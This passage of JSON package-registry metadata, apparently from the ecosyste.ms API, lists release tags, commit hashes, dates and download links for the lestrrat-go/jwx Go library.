projects","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/36653903?v=4","repositories_count":99,"last_synced_at":"2023-08-07T14:22:53.617Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/lestrrat-go","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-06T19:45:03.488Z","updated_at":"2023-08-07T14:22:54.666Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go/repositories"},"tags":[{"name":"v3.0.13","sha":"163a6e94d45a8f89c7d0e25f30652a95c554bd88","kind":"commit","published_at":"2026-01-12T06:38:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13/manifests"},{"name":"v3.0.12","sha":"987379965645db94a50483d7c21c9358b905469a","kind":"commit","published_at":"2025-10-20T09:17:05.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12/manifests"},{"name":"v3.0.11","sha":"9e9c27a269a1a650e1f666b18946dd1796f84779","kind":"commit","published_at":"2025-09-14T02:50:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11/manifests"},{"name":"v3.0.10","sha":"e14eb9b9730b352cb5f8854bbdf315bb98d1a5e0","kind":"commit","published_at":"2025-08-04T12:36:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10/manifests"},{"name":"v3.0.9","sha":"8babbb1d64fda50d89276b5d52b1a682362334b2","kind":"commit","published_at":"2025-07-31T06:59:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9/manifests"},{"name":"v3.0.8","sha":"7f3caf368dda160290bcc6952b4bfb549e308271","kind":"commit","published_at":"2025-06-27T10:33:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8/manifests"},{"name":"v3.0.7","sha":"202bc50cf39999c4379eaaa593e4bd2aea9f870f","kind":"commit","published_at":"2025-06-16T00:42:56.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7/manifests"},{"name":"v3.0.6","sha":"a68b08e71ab7cc4fb6098d2c453da41cc7a7967f","kind":"commit","published_at":"2025-06-13T11:06:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"c3404a9d9937bc0d7a0f89ecfbc1303fd108c67d","kind":"commit","published_at":"2025-06-11T00:58:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"3f1f2b899191cf6c40404736681a180e479c84eb","kind":"commit","published_at":"2025-06-09T12:04:08.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4/manifests"},{"name":"v3.0.3","sha":"b1a4fc672df21b754d9904306e80c9be22deeba4","kind":"commit","published_at":"2025-06-06T01:53:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"542198a7a000125443d53107fbd55c9336943c4d","kind":"commit","published_at":"2025-06-03T12:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2/manifests"},{"name":"v2.1.6","sha":"13e92f3eb3982c11fa6a19280e00e3256237cf87","kind":"commit","published_at":"2025-04-29T08:17:11.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6/manifests"},{"name":"v3.0.1","sha":"374ec5920fce56373ebe3a9c89134a2d6f81d4cd","kind":"commit","published_at":"2025-04-29T08:15:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1/manifests"},{"name":"v2.1.5","sha":"a980d2346e8d17ddab69742e30ca1070018b0bf6","kind":"commit","published_at":"2025-04-16T11:17:27.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5/manifests"},{"name":"v1.2.31","sha":"26ecf5d02cf6226f49e703bdddcae54dcf5ae0da","kind":"commit","published_at":"2025-04-09T10:38:17.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.31","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31/manifests"},{"name":"v3.0.0","sha":"8884a402374939b27c9b96782e9e60a31aed75f6","kind":"commit","published_at":"2025-03-31T23:45:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0/manifests"},{"name":"v3.0.0-beta2","sha":"c44f4f6a7da1328f467d9c4a31f884bc7fd27fa6","kind":"commit","published_at":"2025-03-29T23:21:02.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta2/manifests"},{"name":"v3.0.0-beta1","sha":"766a05908e5a0a90c40e5abb8cc4a3cfa523c7e8","kind":"commit","published_at":"2025-03-14T23:55:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-beta1/manifests"},{"name":"v3.0.0-alpha3","sha":"da52a87c8b4bfb1d68fb6a07b1dc03d1be65d781","kind":"commit","published_at":"2025-03-13T00:03:55.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha3/manifests"},{"name":"v3.0.0-alpha2","sha":"0076496d247519f9650be6c5fff022f3a70e488c","kind":"commit","published_at":"2025-02-25T09:36:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha2/manifests"},{"name":"v2.1.4","sha":"de347302071b3af3457ac67e9885e1396b6ec023","kind":"commit","published_at":"2025-02-25T09:32:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"9e379c7bc07f7d931efcf6082b5456379aba496f","kind":"commit","published_at":"2024-11-24T10:03:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.3/manifests"},{"name":"v3.0.0-alpha1","sha":"64985973018b6e8057905dc107d442a9f52c92c8","kind":"commit","published_at":"2024-11-01T06:22:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0-alpha1/manifests"},{"name":"v2.1.2","sha":"536b643c661a886300246d2f334d4d836e61f497","kind":"commit","published_at":"2024-10-25T06:34:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.2/manifests"},{"name":"v1.2.30","sha":"a7656533fb37069151200cc0d1d61fd44b459d77","kind":"commit","published_at":"2024-07-28T00:14:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.30","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.30/manifests"},{"name":"v2.1.1","sha":"8d1d78351e9f259723f9f558889a78e327379683","kind":"commit","published_at":"2024-07-28T00:05:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"639d23173f8e958666dc34add887fe054d52790b","kind":"commit","published_at":"2024-06-17T22:49:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.0/manifests"},{"name":"v1.2.29","sha":"1025f8eec3bd80c8d8f1be8f9cad989a5b78fd4b","kind":"commit","published_at":"2024-03-07T02:56:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.29","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.29/manifests"},{"name":"v2.0.21","sha":"611d914efbccb0babbce54e48457070e12ab6498","kind":"commit","published_at":"2024-03-07T02:47:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.21/manifests"},{"name":"v2.0.20","sha":"c3b3a177580a7aaa73a033706d0009871c49bd8d","kind":"commit","published_at":"2024-02-19T23:34:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.20/manifests"},{"name":"v1.2.28","sha":"8c53d0ae52d5ab1e2b37c5abb67def9e7958fd65","kind":"commit","published_at":"2024-01-09T01:52:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.28","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.28/manifests"},{"name":"v2.0.19","sha":"d69a721931a5c48b9850a42404f18e143704adcd","kind":"commit","published_at":"2024-01-09T01:44:48.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.19/manifests"},{"name":"v1.2.27","sha":"611567baacc0ef42263708892a08533812324a14","kind":"commit","published_at":"2023-12-03T07:23:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.27","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.27/manifests"},{"name":"v2.0.18","sha":"e75b7c8dcbf8e56ecfbeb17b8b3ffaa81a96914f","kind":"commit","published_at":"2023-12-03T06:57:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.18/manifests"},{"name":"v2.0.17","sha":"c02af3ecf9f8248181ce98056d90cd96605dd658","kind":"commit","published_at":"2023-11-20T04:20:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.17/manifests"},{"name":"v2.0.16","sha":"3e23a27c76861ce73ca605b10969ba7107ec7117","kind":"commit","published_at":"2023-10-30T23:18:36.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.16/manifests"},{"name":"v2.0.15","sha":"8074e35522a552c4c974004c8cd57c02cb5fd8e8","kind":"commit","published_at":"2023-10-19T23:39:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.15/manifests"},{"name":"v2.0.14","sha":"42d47a75de7858fc60492f617a6ec4a9eda7d8dd","kind":"commit","published_at":"2023-10-17T00:54:09.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.14/manifests"},{"name":"v2.0.13","sha":"be93b3f4afa02a079e3f2ca94da6a29e828cc4ed","kind":"commit","published_at":"2023-09-26T09:15:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.13/manifests"},{"name":"v2.0.12","sha":"466c2774000a594f12a57dcf788be4e58e83ce04","kind":"commit","published_at":"2023-08-10T02:55:19.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.12/manifests"},{"name":"v2.0.11","sha":"6c41e3822485fc7e11dd70b4b0524b075d66b103","kind":"commit","published_at":"2023-06-14T08:15:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.11/manifests"},{"name":"v1.2.26","sha":"d9ddbc8e5009cfdd8c28413390b67afa7f576dd6","kind":"commit","published_at":"2023-06-14T08:09:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.26","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.26/manifests"},{"name":"v2.0.10","sha":"8840ffd4afc5839f591ff0e9ba9034af52b1643e","kind":"commit","published_at":"2023-06-12T07:24:20.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.1